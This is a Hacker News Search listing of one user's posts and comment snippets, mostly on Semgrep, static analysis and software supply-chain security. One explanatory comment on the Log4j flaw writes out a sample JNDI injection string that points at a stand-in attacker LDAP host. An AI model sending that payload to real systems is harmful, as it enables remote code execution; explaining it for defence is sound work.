Y
HN Search
Hacker News Search
new
|
comments
|
top
|
jobs
ievans
searching PlanetScale…
1.
▲
2.
▲
3.
▲
4.
▲
5.
▲
6.
▲
14 ms
·
31.
▲
Diplomacy and Meta AI’s Cicero
(ai.facebook.com)
1 points
by
ievans
4y ago
|
0 comments
32.
▲
by
ievans
4y ago
Sad to see this as someone who enjoyed these as a kid and entering robotics competitions based off of them; hopefully the new products will keep the spirit alive. There was even some decent FOSS tooling that developed on top of Mindstorms:
33.
▲
by
ievans
4y ago
Both Semgrep Supply Chain and govulncheck (AFAIK) are doing this work manually, for now. It would indeed be nice if the vulnerability reporting process had a way to provide metadata, but there's no real consensus on what format that da
34.
▲
by
ievans
4y ago
All the engine functionality is FOSS https://semgrep.dev/docs/experiments/r2c-internal-project-de... (code at https://github.com/returntocorp/semgrep); but the rules are currently private (ma
35.
▲
by
ievans
4y ago
We added support to the Semgrep engine for combining package metadata restrictions (from the CVE format) with code search patterns that indicate you're using the vulnerable library (we're writing those mostly manually, but Semgrep
36.
▲
Ignore 98% of dependency alerts: introducing Semgrep Supply Chain
(r2c.dev)
176 points
by
ievans
4y ago
|
59 comments
37.
▲
by
ievans
4y ago
Thanks for the correction; my knowledge is a bit out of date, Firefox at least (not sure about Safari) switched to W^X JIT a good while back: https://jandemooij.nl/blog/wx-jit-code-enabled-in-firefox/ . That's
38.
▲
by
ievans
4y ago
Notable highlights for me: > Lockdown Mode is available in iOS 16 and coming soon in iPadOS 16 and macOS Ventura. > Web browsing - Certain complex web technologies are blocked, which might cause some websites to load more slowly or no
39.
▲
by
ievans
4y ago
This is great news! I like how the article cites evidence that MFA is disproportionately effective against account takeover. If the rubygems devs are looking for other highly effective wins against supply chain attacks: I think the next thi
40.
▲
by
ievans
5y ago
This is a great article and I think tree-sitter's design choices are creating a budding ecosystem of new program analysis tooling. This article discusses the speed advantages, but I think the fact that tree-sitter is dependency-free (w
41.
▲
by
ievans
5y ago
Hadolint is great! If you want to customize your lint logic beyond the checks in it, I recently wrote a Semgrep rule to require all our Dockerfiles to pin images with a sha256 hash that could be a good starting point: https://git
42.
▲
JavaScript static analysis comparison: ESLint vs. Semgrep
(r2c.dev)
1 points
by
ievans
5y ago
|
0 comments
43.
▲
by
ievans
5y ago
Author here. The idea for this post came about after a HN reply ( https://news.ycombinator.com/item?id=28965469 ) to one of my comments about the ua-parser-js issue. And the most recent trigger was a conversation with some Ru
44.
▲
by
ievans
5y ago
If you are logging a user-controlled string, the user can provide a string that uses the JNDI URL schema like ${jndi:ldap://attackercontrolled.evil}. This will fetch deserialize an arbitrary Java object, which can cause arbitrary
45.
▲
by
ievans
5y ago
If you'd like to detect whether you're affected by this dynamically, it looks like https://github.com/google/tsunami-security-scanner-plugins/i... will eventually make it into Google's dynamic scann
46.
▲
by
ievans
5y ago
This is a great example of a "feature" that seems to make sense but, for reasons I can't quite put my finger on, really bothers me. Maybe it's that Discourse's search functionality didn't really work well, or s
47.
▲
by
ievans
5y ago
Our analysis actually covers this case (and the obfuscation case below) just fine: we don’t care about being precise, just very conservative. So any use of setTimeout where the first argument is not a function is flagged as a potential dy
48.
▲
by
ievans
5y ago
Our approach to solving this on our open source project: 1. Enforce use of lock files 2. On any PR that changes any hash in the lock file, run a static analysis that looks for “permission” changes in any source file. E.g., used network, use
49.
▲
Sanitize your inputs? I think not
(kevinsmith.io)
2 points
by
ievans
5y ago
|
0 comments
50.
▲
by
ievans
5y ago
For those unfamiliar with these attack vectors, there code injection and denial-of-service issues that in previous version of Python, were exploitable by default. Projects like https://pypi.org/project/defusedxml/
51.
▲
Protect Your GitHub Actions with Semgrep
(r2c.dev)
4 points
by
ievans
5y ago
|
0 comments
52.
▲
Semgrep rules registry: 1,100+ linter rules
(github.com)
6 points
by
ievans
5y ago
|
0 comments
53.
▲
A Practical Introduction to Semgrep
(bernardoamc.com)
1 points
by
ievans
5y ago
|
0 comments
54.
▲
by
ievans
5y ago
I work at r2c, the company that maintains Semgrep. Happy to answer any questions! It's been a busy week for us; on Tuesday Gitlab announced that in release 14.0 they replaced their Py/Js/Ts security analyzers with Semgrep: h
55.
▲
by
ievans
5y ago
Sounds like you know the language-specific AST tooling for your stack well, but if you are looking for AST patching that uses a generic approach across many languages, I'm a maintainer for a project named Semgrep ( https://en
56.
▲
Lightstep Is Joining ServiceNow
(lightstep.com)
1 points
by
ievans
5y ago
|
0 comments
57.
▲
by
ievans
5y ago
Semgrep started off as a “syntactic grep” but has increasingly become more semantic. So if you want to find all calls to foo that have 1 as the first argument, you just search for foo(1) and even things like x = 1; foo(x); will match. Here’
58.
▲
Semgrep: Semantic grep for code
(semgrep.dev)
415 points
by
ievans
5y ago
|
104 comments
59.
▲
Preventing heartbleed bugs with safe programming languages
(bluishcoder.co.nz)
2 points
by
ievans
6y ago
|
0 comments
60.
▲
Custom Static Analysis Rules Showdown: Brakeman vs. Semgrep
(blog.includesecurity.com)
3 points
by
ievans
6y ago
|
0 comments
More ›